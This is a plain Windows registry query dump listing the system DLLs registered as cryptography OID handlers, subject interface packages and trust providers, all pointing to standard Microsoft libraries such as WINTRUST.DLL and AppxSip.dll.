HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{000C10F1-0000-0000-C000-000000000046} Dll REG_SZ C:\Windows\System32\MSISIP.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{06C9E010-38CE-11D4-A2A3-00104BD35090} Dll REG_SZ C:\Windows\System32\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{0AC5DF4B-CE07-4DE2-B76E-23C839A09FD1} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{0F5F58B3-AADE-4B9A-A434-95742D92ECEB} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{1629F04E-2799-4DB5-8FE5-ACE10F17EBAB} Dll REG_SZ C:\Windows\System32\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{1A610570-38CE-11D4-A2A3-00104BD35090} Dll REG_SZ C:\Windows\System32\wshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{5598CFF1-68DB-4340-B57F-1CACF88C9A51} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{603BCC1F-4B59-4E08-B724-D2C6297EF351} Dll REG_SZ C:\Windows\System32\WindowsPowerShell\v1.0\pwrshsip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{9BA61D3F-E73A-11D0-8CD2-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{9F3053C5-439D-4BF7-8A77-04F0450A1D9F} Dll REG_SZ C:\Windows\System32\EsdSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{C689AAB8-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{C689AAB9-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{C689AABA-8E78-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{CF78C6DE-64A2-4799-B506-89ADFF5D16D6} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{D1D04F0C-9ABA-430D-B0E4-D7E96ACCE66C} Dll REG_SZ C:\Windows\System32\AppxSip.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{DE351A42-8E59-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{DE351A43-8E59-11D0-8C47-00C04FC295EE} Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptsvcDllCtrl\DEFAULT Dll REG_MULTI_SZ C:\Windows\System32\crypttpmeksvc.dll\0C:\Windows\System32\cryptcatsvc.dll\0C:\Windows\System32\webauthn.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\GetSecureTime\DEFAULT Dll REG_MULTI_SZ C:\Windows\System32\SecureTimeAggregator.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CertDllVerifyCTLUsage\DEFAULT Dll REG_MULTI_SZ C:\Windows\System32\cryptnet.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CertDllVerifyRevocation\DEFAULT Dll REG_MULTI_SZ C:\Windows\System32\cryptnet.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2000 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2001 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2002 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2003 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2004 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2005 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2006 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2007 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2008 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2009 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2010 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2011 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2012 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2130 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2221 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2222 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\#2223 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.12.2.1 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.12.2.2 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.12.2.3 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.16.1.1 Dll REG_SZ C:\Windows\System32\cryptdlg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.16.4 Dll REG_SZ C:\Windows\System32\cryptdlg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.1.10 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.1.11 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.1.12 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.1.15 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.1.20 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.1.25 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.1.26 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.1.27 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.1.28 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.1.30 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.1.4 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.4.2 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.4.3 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObject\1.3.6.1.4.1.311.2.4.4 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObjectEx\1.2.840.113549.1.9.16.1.1 Dll REG_SZ C:\Windows\System32\inetcomm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObjectEx\1.2.840.113549.1.9.16.2.1 Dll REG_SZ C:\Windows\System32\inetcomm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObjectEx\1.2.840.113549.1.9.16.2.11 Dll REG_SZ C:\Windows\System32\inetcomm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObjectEx\1.2.840.113549.1.9.16.2.12 Dll REG_SZ C:\Windows\System32\inetcomm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObjectEx\1.2.840.113549.1.9.16.2.2 Dll REG_SZ C:\Windows\System32\inetcomm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObjectEx\1.2.840.113549.1.9.16.2.3 Dll REG_SZ C:\Windows\System32\inetcomm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllDecodeObjectEx\1.2.840.113549.1.9.16.2.4 Dll REG_SZ C:\Windows\System32\inetcomm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2000 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2001 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2002 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2003 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2004 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2005 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2006 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2007 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2008 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2009 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2010 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2011 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2012 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2130 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2221 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2222 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\#2223 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.12.2.1 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.12.2.2 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.12.2.3 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.16.1.1 Dll REG_SZ C:\Windows\System32\cryptdlg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.16.4 Dll REG_SZ C:\Windows\System32\cryptdlg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.1.10 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.1.11 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.1.12 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.1.15 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.1.20 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.1.25 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.1.26 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.1.27 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.1.28 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.1.30 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.1.4 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.4.2 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.4.3 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObject\1.3.6.1.4.1.311.2.4.4 Dll REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.1.1 Dll REG_SZ C:\Windows\System32\inetcomm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.1 Dll REG_SZ C:\Windows\System32\inetcomm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.11 Dll REG_SZ C:\Windows\System32\inetcomm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.12 Dll REG_SZ C:\Windows\System32\inetcomm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.2 Dll REG_SZ C:\Windows\System32\inetcomm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.3 Dll REG_SZ C:\Windows\System32\inetcomm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllEncodeObjectEx\1.2.840.113549.1.9.16.2.4 Dll REG_SZ C:\Windows\System32\inetcomm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllFormatObject\1.3.6.1.5.5.7.3.4 Dll REG_SZ C:\Windows\System32\cryptdlg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 1\CryptDllFormatObject\2.5.29.32 Dll REG_SZ C:\Windows\System32\cryptdlg.dll End of search: 207 match(es) found. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{189A3842-3041-11D1-85E1-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{31D1ADC1-D329-11D1-8ED8-0080C76516C6} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{573E31F8-AABA-11D0-8CCB-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{573E31F8-DDBA-11D0-8CCB-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{6078065b-8f22-4b13-bd9b-5b762776f386} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{64B9D180-8DA2-11CF-8736-00AA00A485EB} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{7801EBD0-CF4B-11D0-851F-0060979387EA} $DLL REG_SZ C:\Windows\System32\Cryptdlg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{A7F4C378-21BE-494e-BA0F-BB12C5D208C5} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{C6B2E8D0-E005-11CF-A134-00C04FD7BF43} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{D41E4F1D-A407-11D1-8BC9-00C04FA30A41} $DLL REG_SZ C:\Windows\System32\WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{D41E4F1F-A407-11D1-8BC9-00C04FA30A41} $DLL REG_SZ C:\Windows\System32\WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{F750E6C3-38EE-11D1-85E5-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\CertCheck\{FC451C16-AC75-11D1-B4B8-00C04FB66EA0} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{189A3842-3041-11D1-85E1-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{31D1ADC1-D329-11D1-8ED8-0080C76516C6} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{573E31F8-AABA-11D0-8CCB-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{573E31F8-DDBA-11D0-8CCB-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{6078065b-8f22-4b13-bd9b-5b762776f386} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{64B9D180-8DA2-11CF-8736-00AA00A485EB} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{7801EBD0-CF4B-11D0-851F-0060979387EA} $DLL REG_SZ C:\Windows\System32\WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{A7F4C378-21BE-494e-BA0F-BB12C5D208C5} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{C6B2E8D0-E005-11CF-A134-00C04FD7BF43} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{D41E4F1D-A407-11D1-8BC9-00C04FA30A41} $DLL REG_SZ C:\Windows\System32\WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{D41E4F1F-A407-11D1-8BC9-00C04FA30A41} $DLL REG_SZ C:\Windows\System32\WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{F750E6C3-38EE-11D1-85E5-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Certificate\{FC451C16-AC75-11D1-B4B8-00C04FB66EA0} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Cleanup\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Cleanup\{189A3842-3041-11D1-85E1-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Cleanup\{573E31F8-AABA-11D0-8CCB-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Cleanup\{573E31F8-DDBA-11D0-8CCB-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Cleanup\{6078065b-8f22-4b13-bd9b-5b762776f386} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Cleanup\{64B9D180-8DA2-11CF-8736-00AA00A485EB} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Cleanup\{7801EBD0-CF4B-11D0-851F-0060979387EA} $DLL REG_SZ C:\Windows\System32\Cryptdlg.dll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Cleanup\{C6B2E8D0-E005-11CF-A134-00C04FD7BF43} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Cleanup\{F750E6C3-38EE-11D1-85E5-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\Cleanup\{FC451C16-AC75-11D1-B4B8-00C04FB66EA0} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\DiagnosticPolicy\{573E31F8-DDBA-11D0-8CCB-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{00AAC56B-CD44-11D0-8CC2-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy\{189A3842-3041-11D1-85E1-00C04FC295EE} $DLL REG_SZ WINTRUST.DLL 